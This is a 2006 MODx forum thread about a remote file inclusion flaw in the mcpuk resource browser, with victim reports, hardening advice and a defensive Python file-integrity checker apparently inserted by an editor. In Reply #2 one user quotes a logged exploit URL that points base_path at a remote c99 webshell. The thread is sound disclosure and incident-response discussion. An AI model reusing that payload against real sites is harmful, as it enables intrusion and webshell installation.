Author Topic: Re: Critical Security Measure  (Read 18138 times)
davidm (MODx evangelist, Marketing & Design Team, Posts: 7,026)
« on: Nov 03, 2006, 02:18 PM »

Admin Note: This is in reference to http://modxcms.com/forums/index.php/topic,8604

Now that was a quick fix!
I am putting a sticky in the French boards about this. I think we should notify all moderators to do the same. Not everyone reads the English boards.

Off to applying the patch on my installs... Edit: DONE. Duh, not needed, I have register_globals OFF...

Anyway, thanks to Aour for reporting this on the original thread.
« Last Edit: Nov 06, 2006, 10:35 AM by rthrash »

.: nodeo.net : For a free, modern and open web! :: david-molliere.net : Follow my experiments and posts on CMSs and other web applications "live" :.

*** Forums modxcms.fr: Take part in building the French-language MODx site! ***

! New ! Live: don't miss the modxcms.fr news on Twitter ! New !

MODx is the ideal tool for developers and web designers looking for a highly flexible, high-performance content management framework that remains simple for end users.

Config: Apache 2.2.8 - MySQL 5.0.67 - PHP 5.2.8 | Debian 4.0 (Etch)

Sites built with MODx: | pargade-notaires.fr | soleil.info | gican.asso.fr | michelez-notaires.com | amadom.gerondicap.com | jocelyne-violet.net
nzkiwi (Jr. Member, Posts: 28)
« Reply #1 on: Nov 04, 2006, 04:35 AM »

I found this thread too late. My client's site has just been hacked by someone taking advantage of this flaw. The hacker used the flaw to modify config.inc.php. On checking zone-h.org, I see he has got to quite a number of other MODx sites during the last 24 hours. I'm trying to persuade my client's host to have register_globals set to off...
Commodore64 (Moderators, Posts: 93)
« Reply #2 on: Nov 04, 2006, 04:59 AM »

The hacker tried to hack my site!
I found the following access in my stats:

http : //www.roma21.it/ index.php?page=manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://hackeramca.tripod.com/c99shell.txt?

Some information about the hacker:
Windows XP, Firefox 2.0, 1024x768 32 bit, 88.224.109.151
Referer: Google (Turkey), query: "powered by MODx"

Apart from this, yesterday I had a HUGE number of accesses coming from the Google query "Powered by MODx"; many of them came from Turkey, but also Egypt, Morocco, Pakistan, China, France, Germany, etc. That's weird; I don't know if Google suddenly increased my PageRank or there are lots of hackers around the net.

Edit: My register_globals variable is set to ON. I wonder why the attack wasn't successful... or perhaps my system has already been infected? What can I do in this case?
« Last Edit: Nov 04, 2006, 05:03 AM by Commodore64 »
davidm (MODx evangelist, Marketing & Design Team)
« Reply #3 on: Nov 04, 2006, 05:04 AM »

Yeah, of course you did; that's how they spot that you're using MODx... I don't know if it's the fact that I have the "powered by" translated into French, but I didn't get hit...

nzkiwi (Jr. Member)
« Reply #4 on: Nov 04, 2006, 06:36 AM »

In the past, I had removed any reference to the CMS being used. Recently I have been putting a simple "Powered by MODx" in the footer of MODx sites in recognition of the advantages MODx provides me. This hack has given me cause to reflect on whether I have done the right thing by including the "powered by..." message.

My concern has always been that a site becomes more vulnerable if it becomes known what scripts are being run on it; that is the reason I removed all references in the first place. MODx does a good job of not revealing its identity in the code it outputs (unlike some other CMSs). The exception is that it seems to be the only CMS that uses "/manager" as its admin directory. Ideally we should be able to choose a unique name at installation time to make the lives of hackers just that much more difficult.
nzkiwi (Jr. Member)
« Reply #5 on: Nov 04, 2006, 07:02 AM »

Quote from Commodore64: My register_globals variable is set to ON. I wonder why the attack wasn't successful... or perhaps my system has already been infected? What can I do in this case?

Although the site was running fine until about 12 hours ago, installing a backup from 30-Oct did not fix the problem. We had to go back to prior to 28-Oct to get up and running again. Once we discovered that the only file affected was config.inc.php, we restored yesterday's backup and then restored config.inc.php from 27-Oct.

I'd like the host provider to provide me with before and after versions of the file, as there may be some date-triggered trojan lurking in there. As a precaution, it might not hurt to check out that file.
yentsun (MODx Russia, Committed to MODx, Posts: 518)
« Reply #6 on: Nov 04, 2006, 08:34 AM »

I've been hacked also... the sucker left a message: "rtendo@sbcglobal.net was here"

http://modx.ru - Russian MODx support
http://modxnotes.blogspot.com/ - personal blog about MODx
http://yentsun.com - personal site
Jesse R. (Coding Team, Posts: 785)
« Reply #7 on: Nov 04, 2006, 10:29 AM »

Well, another way to give credit to MODx without having the text is to use an IMG with no ALT tag. I think there are images floating around the forum to that effect.

Jesse R.
Consider trying something new and extraordinary.
Illinois Wine

Have you considered donating to MODx lately?
Donate now.  Every contribution helps.
identity (Full Member, Posts: 226)
« Reply #8 on: Nov 04, 2006, 10:49 AM »

It's unfortunate, but the reality has become that you take a big risk providing critical information publicly like that about the scripts you use. In some ways, when an exploit is found, you may be doing more harm than good to the reputation of the script. Forum makers are in some ways their own worst enemies... most require a credit and a link back to their sites, which means as soon as an exploit gets discovered, the hackers can turn to the search engines and get a list of potential targets in seconds.

It would seem that hackers have become highly efficient... specializing in going after certain scripts or using certain exploits to increase their "success" rate and hit as many targets in as short a period of time as possible. Too bad all that intelligence can't be put to some better use.

| Identity Developments delivers SEO focused web design and web presence services
- it's not about websites, it's about your identity.
| Get the Website Planning Kit | Create a Site by Nite |
sottwell (Documentation Team, Posts: 8,837)
« Reply #9 on: Nov 04, 2006, 11:03 AM »

Well, now with the new Google Code Search, it may be possible for them to find any site with that vulnerability.

sottwell.com has moved to a lovely Solaris 10 server!
Log in username guest, password guestuser.
Templates are now becoming available at http://sottwell.com/templates.html
straty (Full Member, Posts: 136)
« Reply #10 on: Nov 04, 2006, 11:06 AM »

Thanks for the heads up. I just checked and thankfully I have globals off.

I made my first site with modx
------------------------
http://www.shop-bright.com | Uk shopping blog
sottwell (Documentation Team)
« Reply #11 on: Nov 04, 2006, 11:11 AM »

Globals off and PHP running under suExec, so I don't have to have anything at all with world-writable permissions, were things I looked for in hosting.

OpenGeek (MODx Co-Founder, Foundation, Posts: 5,813)
« Reply #12 on: Nov 04, 2006, 11:26 AM »

Just another reminder: my personal sites were hit with over 200 attempts to exploit this vulnerability in the last 24 hrs and they are still at it; luckily I help run my own server and we configured the box with register_globals = off, so not one of the attempts has been or will be successful.

Regardless, I want to reiterate how critical it is that you patch or remove the mcpuk resource browser if you have register_globals=On; I personally would remove it completely for now unless you specifically need it for the sites' editors to use. If you do remove it, don't forget to disable the resource browser in your configuration, so that FCKEditor or TinyMCE can still be used despite the lack of the resource browser.

If you have been hit already, it's best to clean out the entire file system in your account and load clean files back in. Otherwise you are going to need to search through the file system very thoroughly to make sure there are not any files left by the intruder that may cause further damage in the future or allow further exploits to occur.

Finally, after initial reviews of all the various security exploits involving FredCKEditor, I'm simply uncertain whether additional unidentified vulnerabilities exist in the mcpuk resource browser code currently integrated into MODx, and considering the nature of the exploit, I wouldn't take any chances until we announce an official new release of the/a resource browser, especially if you are unsure whether your server is properly secured against these types of attacks.

Jason Coward
MODx Co-Founder
xPDO Founder
CTO @ Collabpad
work productively.
work intelligently.
work together.
Light is just a vibration of a note too. Everything is. You've got to keep that in mind.
  Frank Zappa
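OpenGeek's advice to reload clean files, and nzkiwi's finding earlier in the thread that only config.inc.php had changed, come down to the same check: diff the deployed tree against a known-good copy. The following is an added example (my code, not MODx's or the forum's) that hashes every file under two trees and reports what was modified, added or removed; added files with executable extensions are listed separately because that is where dropped webshells show up. The directory layout built by demo(), including the path manager/includes/config.inc.php, is an assumption modelled on MODx Evolution's layout rather than taken from the thread, and both trees are constructed in temporary directories.

```python
"""Compare a deployed MODx tree against a known-good snapshot (a backup taken
before the compromise, or a fresh install of the same release) and report
modified, added and missing files.  Added example, not MODx code."""
import hashlib
import tempfile
from pathlib import Path

# Extensions the web server would execute if an intruder dropped them into an
# upload directory; added files with these suffixes are singled out.
EXECUTABLE_EXT = {'.php', '.php3', '.php4', '.php5', '.phtml', '.inc'}


def sha256_file(path, chunk=1 << 16):
    """SHA-256 of one file, read in chunks so large uploads don't load into memory."""
    h = hashlib.sha256()
    with open(path, 'rb') as fh:
        for block in iter(lambda: fh.read(chunk), b''):
            h.update(block)
    return h.hexdigest()


def hash_tree(root):
    """Map every regular file under root (POSIX-style relative path) to its SHA-256."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob('*')) if p.is_file()}


def compare(known_good, deployed):
    """Diff two hash_tree() manifests.  Everything in 'added' needs a reason to
    exist; 'modified' is where a tampered config.inc.php shows up."""
    modified = sorted(k for k in known_good if k in deployed and known_good[k] != deployed[k])
    added = sorted(k for k in deployed if k not in known_good)
    missing = sorted(k for k in known_good if k not in deployed)
    return {
        'modified': modified,
        'added': added,
        'missing': missing,
        'executable_added': [k for k in added if Path(k).suffix.lower() in EXECUTABLE_EXT],
    }


def _write(root, rel, text):
    p = Path(root) / rel
    p.parent.mkdir(parents=True, exist_ok=True)
    p.write_text(text)


def demo():
    """Build two constructed trees in temp dirs and diff them.  Paths are
    assumptions modelled on MODx Evolution's layout, not taken from the thread."""
    clean = {
        'index.php': '<?php // front controller\n',
        'manager/index.php': '<?php // manager\n',
        'manager/includes/config.inc.php': "<?php $database_server = 'localhost';\n",
        'manager/media/browser/mcpuk/browser.html': '<html>mcpuk</html>\n',
        'assets/images/logo.gif': 'GIF89a',
    }
    with tempfile.TemporaryDirectory() as good_dir, tempfile.TemporaryDirectory() as live_dir:
        for rel, text in clean.items():
            _write(good_dir, rel, text)
        for rel, text in clean.items():
            if rel.startswith('manager/media/browser/mcpuk/'):
                continue  # admin removed the resource browser, as advised above
            _write(live_dir, rel, text)
        # The intruder edited the config and dropped a script in an upload dir.
        _write(live_dir, 'manager/includes/config.inc.php',
               clean['manager/includes/config.inc.php'] + "// modified by intruder\n")
        _write(live_dir, 'assets/images/c99.php', '<?php // webshell placeholder\n')
        return compare(hash_tree(good_dir), hash_tree(live_dir))


if __name__ == '__main__':
    for kind, files in demo().items():
        print(f'{kind}: {files}')
```

Run it against a backup from before the compromise rather than against a fresh download of the distribution: config.inc.php legitimately differs from the vendor copy, so a vendor comparison always lists it as modified and hides the real change. Missing files are worth listing too, since they record what the admin removed (here the mcpuk browser), which is what you want to confirm after following the advice above.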
davidm (MODx evangelist, Marketing & Design Team)
« Reply #13 on: Nov 04, 2006, 01:21 PM »

I have several French users reporting they failed to see the announcement in time to avoid being hacked (note that I posted a sticky in the French Announcement board, with a how-to for checking their register_globals settings). I have been repeatedly asked that we send out a message via the SMF messaging system, for example. I am not sure this is the way to go and will ask that they subscribe to the Announcement forum instead.

Maybe a dedicated Security board to which users could subscribe would be even easier. Not sure which way is best, but I am here so often I don't have the same perspective the average user will have.

OncleBen31 (Sr. Member, Posts: 283)
« Reply #14 on: Nov 04, 2006, 01:33 PM »

I've added feature request FS#653 asking for a box in the manager that displays announcements from the official MODx site, like the admin page of SMF does.
This feature would allow security warnings to be transmitted quicker than an announcement in the forum.